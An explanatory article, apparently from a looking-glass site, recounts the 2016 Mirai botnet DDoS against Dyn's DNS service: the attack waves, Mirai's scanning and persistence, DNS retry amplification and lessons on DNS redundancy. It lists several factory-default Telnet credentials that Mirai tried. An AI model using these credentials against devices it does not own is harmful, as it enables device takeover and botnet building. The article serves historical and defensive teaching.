The Dyn DNS DDoS Attack and Mirai Botnet (2016)
On the morning of October 21, 2016, the internet broke. Not a single website or service, but a vast swath of the web's most-visited properties — Twitter, Netflix, Reddit, GitHub, Spotify, CNN, The New York Times, and dozens more — became unreachable for millions of users across the United States and Europe. The cause was not a cable cut or a software bug. It was an army of compromised security cameras, DVRs, and home routers, welded into a weapon called the Mirai botnet, aimed squarely at a single target: Dyn, one of the internet's most important managed DNS providers.
The Dyn attack was a watershed moment for the internet. It exposed how a critical piece of infrastructure — DNS — could become a catastrophic single point of failure, and it demonstrated that the billions of cheap, insecure IoT devices entering the world were not merely a nuisance but a genuine threat to the stability of the global network.
What is Dyn? Understanding the Target
Dyn (acquired by Oracle in 2016, shortly after the attack) was a managed DNS provider. When you type twitter.com into your browser, your device needs to resolve that domain name into an IP address before it can connect. Twitter, like many large websites, did not run its own authoritative DNS infrastructure — it outsourced that function to Dyn. Dyn's servers were the authoritative source for translating twitter.com (and thousands of other domains) into IP addresses.
This meant that if Dyn's DNS servers could not respond to queries, none of the domains they hosted could be resolved. The websites themselves were still running. The servers behind Twitter, Reddit, and Spotify were up, their BGP routes were still being announced, and their autonomous systems were fully operational. But users could not reach them, because the DNS layer that translates names to addresses had been knocked offline.
The Mirai Botnet: An Army of IoT Devices
The weapon used against Dyn was the Mirai botnet, a piece of malware that specifically targeted Internet of Things (IoT) devices — IP cameras, digital video recorders (DVRs), home routers, and other embedded Linux devices. Mirai's approach was brutally simple: it scanned the internet for devices that were still using factory-default usernames and passwords, logged in via Telnet (port 23) or SSH (port 22), and installed itself.
The list of credentials Mirai tried was shockingly short — about 60 username/password combinations. Entries like admin/admin, root/root, root/123456, and admin/password were enough to compromise an estimated 100,000 or more devices worldwide. These were not sophisticated exploits against zero-day vulnerabilities. They were default passwords that manufacturers shipped with their products and that consumers never changed.
Once a device was infected, it became a soldier in the botnet, ready to flood any target with traffic on command. The device continued its normal function — the camera still recorded, the DVR still played back — so most owners had no idea their hardware had been conscripted.
Three Waves of Attack
The attack on Dyn unfolded in three distinct waves over the course of the day:
Wave 1: 11:10 UTC — Eastern US Impact
The first wave began around 11:10 UTC (7:10 AM Eastern). It targeted Dyn's DNS infrastructure serving the US East Coast. Within minutes, users on the eastern seaboard found that major websites simply would not load. DNS queries to Dyn's servers were either timing out or being dropped entirely. Dyn's engineering team began mitigating at 11:36 UTC, and service was largely restored by 13:20 UTC — about two hours after the attack began.
Wave 2: 15:50 UTC — Broader and More Sophisticated
Just as it seemed the crisis was over, a second wave struck at 15:50 UTC. This time, the attack was broader in scope and more sophisticated in technique, hitting Dyn's infrastructure from more diverse sources and targeting additional server clusters. The attack traffic was globally distributed, coming from tens of millions of IP addresses — many of which were the IoT devices under Mirai's control, but some of which were legitimate recursive resolvers whose caches had expired and were now hammering Dyn with retry queries, amplifying the chaos.
Wave 3: 20:00 UTC — The Final Push
A third wave launched around 20:00 UTC. By this point, Dyn's team had learned from the first two waves and was able to mitigate this attack more quickly. But the damage to confidence had been done. An entire day of repeated outages affecting the world's biggest websites had demonstrated a vulnerability that the internet community could not ignore.
The Scale: ~1.2 Terabits per Second
The Mirai attack on Dyn generated an estimated 1.2 Tbps (terabits per second) of attack traffic at its peak. To appreciate the scale: in 2016, the entire transatlantic cable capacity between the US and Europe was roughly 50-80 Tbps total. A single botnet was generating enough traffic to fill more than 1% of the world's intercontinental bandwidth.
The attack used a mix of techniques. The majority of the traffic was DNS query floods — syntactically valid DNS queries sent at enormous volume. This was particularly insidious because the attack traffic looked like legitimate DNS queries, making it harder to filter. The botnet also used TCP SYN floods, UDP floods, and other volumetric attack methods to overwhelm Dyn's infrastructure from multiple angles simultaneously.
What made Mirai especially effective was its use of direct-path attacks rather than reflection/amplification. Earlier DDoS botnets often relied on spoofed source addresses to bounce traffic off open DNS resolvers or NTP servers. Mirai did not need to amplify — it had enough raw firepower from its hundreds of thousands of compromised devices to simply flood the target directly. Each device might contribute only a few megabits per second, but at scale, 100,000 devices contributing 10 Mbps each yields a terabit.
Who Went Down and Why
The list of affected sites reads like a who's-who of the internet:
- Twitter — entirely unreachable during the first wave for East Coast users
- Reddit — intermittent access failures throughout the day
- Netflix — unavailable for large portions of the US
- GitHub — intermittent DNS resolution failures
- Spotify — streaming service disrupted
- CNN, The New York Times — news sites unreachable during a critical election period
- PayPal, Airbnb, Etsy, SoundCloud, and many more
The common thread was straightforward: these organizations all relied on Dyn as their primary or sole DNS provider. Their servers were running, their network prefixes were being announced in BGP, and their CDN edges were operational. But DNS is the first step of every connection — without it, browsers had no way to discover which IP address to connect to.
Some organizations that used multiple DNS providers (or had quick failover mechanisms) weathered the attack with minimal impact. This became the single most important lesson of the day: DNS redundancy is not optional.
The Mirai Source Code Release
Weeks before the Dyn attack, on September 30, 2016, an individual using the pseudonym "Anna-senpai" released the full Mirai source code on the Hackforums criminal marketplace. The post was framed as a retirement announcement — Anna-senpai claimed that with increasing attention from the security community and law enforcement, it was time to move on.
The release had two profound consequences. First, it allowed security researchers to fully analyze how Mirai worked — its scanning logic, its hardcoded credential list, its command-and-control protocol. Second, and more dangerously, it gave every aspiring attacker a ready-made DDoS weapon. Within weeks, dozens of Mirai variants appeared, operated by different groups, competing to infect devices. The October 21 Dyn attack was carried out by one such operator.
In December 2017, three young Americans — Paras Jha, Josiah White, and Dalton Norman — pleaded guilty to creating and operating the original Mirai botnet. Their initial motivation had been to gain advantage in Minecraft server hosting disputes by DDoSing competitors. The fact that one of the most consequential cyberattacks in history originated from a Minecraft grudge match remains one of the internet's most darkly ironic episodes.
Why DNS is a Single Point of Failure
The Dyn attack forced the internet industry to reckon with an uncomfortable truth: DNS, despite being a distributed, hierarchical system in theory, can become a concentrated point of failure in practice.
DNS was designed as a distributed system. The root zone is served by 13 identities across hundreds of anycast instances. TLD servers are similarly distributed. But for individual domains, the authoritative DNS is whatever the domain owner configures — and many major websites concentrated that authority in a single managed DNS provider.
When Dyn went down, there was no automatic failover for its customers. DNS resolution does support multiple nameservers per domain (typically configured via NS records), but if all NS records point to the same provider, redundancy is an illusion. The fix, as the diagram shows, is to configure authoritative DNS across multiple independent providers — so that if one is attacked, the others continue answering queries.
How Mirai Worked: A Technical Deep Dive
Mirai's architecture was a case study in effective malware design. Despite being written by college-age programmers for petty Minecraft disputes, its engineering was surprisingly competent.
Scanning and Infection
Mirai bots continuously generated random IP addresses and attempted Telnet connections on port 23 and SSH on port 22. The scanner avoided certain IP ranges — including the US Department of Defense, IANA reserved blocks, and GE and HP corporate ranges — presumably to reduce the chance of attracting attention from well-resourced targets.
When a connection succeeded, the bot tried credentials from its hardcoded list of ~60 username/password pairs. The list was compiled from default credentials used by manufacturers of IP cameras, DVRs, and routers. Popular entries included:
root / xc3511— a default used by numerous Chinese IP camera manufacturersroot / vizxv— Dahua DVR defaultadmin / admin— generic defaultroot / 888888— used by several DVR modelsroot / default— common Linux embedded default
Persistence and Competition
Once installed, Mirai ran entirely in memory. It deleted its own binary from disk and masked its process name to avoid detection. It also killed any existing malware processes on the device and blocked the Telnet port to prevent competing botnets from infecting the same device. In the IoT malware ecosystem, devices were contested territory, and Mirai aggressively defended its turf.
Command and Control
Infected devices reported to a command-and-control (C2) server, which maintained a registry of all bots and could direct them to attack specified targets. The C2 protocol was custom and lightweight, designed for devices with minimal CPU and memory. Attack commands specified the target IP, port, duration, and attack type.
Attack Vectors
Mirai supported ten different DDoS attack types, including UDP floods, TCP SYN floods, ACK floods, GRE protocol floods, and DNS water torture attacks (sending queries for random subdomains of the target domain, preventing caching from absorbing the load). The DNS water torture technique was particularly effective against Dyn, because each query was unique and appeared legitimate.
BGP and Network-Layer Observations
From a BGP and routing perspective, the Dyn attack was instructive because it demonstrated a class of failure that BGP cannot mitigate. The attack did not manipulate routing — it was not a BGP hijack. Dyn's prefixes remained properly announced. Their autonomous system continued advertising routes. RPKI validation, had it been universally deployed, would not have helped, because the routes were legitimate.
The attack operated at the application layer (DNS) while the network layer (BGP/IP) remained intact. This is a critical distinction. A BGP looking glass during the attack would have shown Dyn's routes as healthy — because they were. Packets were being delivered to Dyn's servers; those servers simply could not process legitimate queries amid the flood.
However, BGP-level analysis was useful for understanding the attack's sources. Route collectors could observe traffic patterns suggesting anomalous volumes from certain prefixes associated with IoT-heavy networks. And the downstream effects were visible in BGP data too — as Dyn's servers became intermittently reachable, some DNS-based traffic engineering systems may have triggered route changes in CDN and anycast networks that depended on DNS health checks.
The Amplification Problem
Beyond the direct botnet traffic, the Dyn attack was amplified by an emergent behavior of the DNS infrastructure itself. When a recursive resolver (like those run by ISPs, or Google's 8.8.8.8) fails to get a response from an authoritative server, it retries. When millions of recursive resolvers worldwide simultaneously fail to resolve twitter.com, they all retry — generating a secondary flood of legitimate queries that compounds the original attack traffic.
Dyn reported that during the attack, they observed traffic from "tens of millions" of IP addresses. Many of these were not Mirai bots but recursive resolvers retrying failed queries. This retry amplification effect is a fundamental characteristic of DNS DDoS attacks: the attacker only needs to degrade the authoritative server's response rate enough to trigger retries from the global resolver population, which then does much of the damage for free.
Aftermath and Industry Response
The Dyn attack produced immediate and lasting changes across the internet industry:
Multi-Provider DNS Became Standard
Within weeks of the attack, major websites began configuring secondary DNS providers. Organizations that had relied solely on Dyn (or any single provider) began splitting their authoritative DNS across two or more independent providers — for example, using both AWS Route 53 and Google Cloud DNS, or Cloudflare and Dyn. This ensures that a DDoS against any single provider does not take the domain fully offline.
IoT Security Came Under Scrutiny
The Mirai botnet thrust IoT security into the policy spotlight. The fact that consumer devices with unchangeable default passwords could be weaponized to take down critical infrastructure prompted regulatory discussions worldwide. In 2020, California's SB-327 IoT security law took effect, requiring manufacturers to assign unique default passwords to each device. The UK and EU followed with similar legislation.
DDoS Mitigation Evolved
The Dyn attack accelerated investment in DDoS mitigation services. Providers like Cloudflare (AS13335) and Akamai expanded their scrubbing capacity. Anycast-based DNS services became more common, distributing authoritative DNS across dozens of global points of presence so that volumetric attacks are absorbed across the entire network rather than concentrated at a single site.
DNS Protocol Hardening
The attack reinforced interest in DNS resilience mechanisms: response rate limiting (RRL) to reduce amplification, DNS cookies (RFC 7873) to verify client identity, and aggressive NSEC caching to reduce authoritative server load for negative responses. These measures do not prevent DDoS, but they make DNS infrastructure more resistant to being overwhelmed.
Mirai's Legacy: IoT Botnets Today
Mirai did not end with the convictions of its creators. The source code release ensured that Mirai's DNA lives on in dozens of successor botnets. Variants like Mozi, Hajime, and various unnamed forks continue to scan for vulnerable IoT devices, updating their credential lists and adding exploits for known firmware vulnerabilities.
The IoT device population has grown enormously since 2016. Estimates put the number of connected IoT devices at over 15 billion as of 2025. While security has improved for devices from major manufacturers, the long tail of cheap, generic devices — particularly IP cameras and home routers from lesser-known brands — continues to ship with weak or hardcoded credentials.
Modern botnets also exploit known software vulnerabilities in addition to default credentials. Unpatched routers, NAS devices, and smart home equipment provide a steady supply of new recruits. The fundamental problem Mirai exposed — that the internet's infrastructure can be attacked using the aggregate bandwidth of millions of poorly secured consumer devices — has not been solved. It has only grown in scale.
Lessons for Network Architecture
The Dyn attack offers durable lessons for anyone building internet-facing services:
- Use multiple DNS providers. Configure at least two independent authoritative DNS providers for any production domain. Ensure they have separate infrastructure and autonomous systems.
- Reduce DNS TTLs strategically. Low TTLs allow faster failover but increase query volume (and thus attack surface). High TTLs reduce query volume but slow failover. Find the right balance for your traffic patterns.
- Employ anycast DNS. Anycast distributes DNS traffic across many locations, naturally absorbing DDoS attacks. Providers like Cloudflare and Google Cloud DNS use anycast extensively.
- Monitor DNS resolution externally. You cannot detect a DNS outage from inside your own network — your servers are up and your local DNS works. Use external monitoring services that probe your domains from diverse locations.
- Understand your dependency chain. Map every external service your application depends on. DNS is often invisible until it fails. CDN, load balancers, certificate authorities, and API gateways are other common hidden dependencies.
- Consider DNS prefetching and caching. Applications that resolve peer-service hostnames can cache and prefetch DNS results to tolerate brief DNS outages without user-visible impact.
The Broader Context: DNS, BGP, and Internet Resilience
The Dyn attack sits alongside other landmark internet failures that have exposed structural vulnerabilities. The Pakistan YouTube hijack of 2008 exposed BGP's trust-based model. The 2021 Facebook outage showed what happens when a network accidentally withdraws all its own BGP routes. The Dyn attack showed that even with perfect routing, a DNS-layer failure can make vast portions of the internet appear offline.
These events are not unrelated. DNS and BGP are co-dependent systems. DNS resolvers reach authoritative servers via BGP routes. DNS-based traffic engineering (used by CDNs and anycast services) depends on correct BGP routing. A failure in either system cascades into the other. Understanding this interdependency is essential for anyone building or operating internet infrastructure.
You can explore the routing infrastructure behind DNS services using the looking glass. The networks that serve DNS for the world's largest websites are visible in BGP data — their AS paths, their peering relationships, and their prefix announcements all tell the story of how the internet's naming system is connected to its routing fabric.
Explore DNS and Routing Infrastructure
You can investigate the networks that power DNS and see how internet infrastructure is routed using the looking glass. Try these lookups to explore the systems that keep the internet's naming layer running: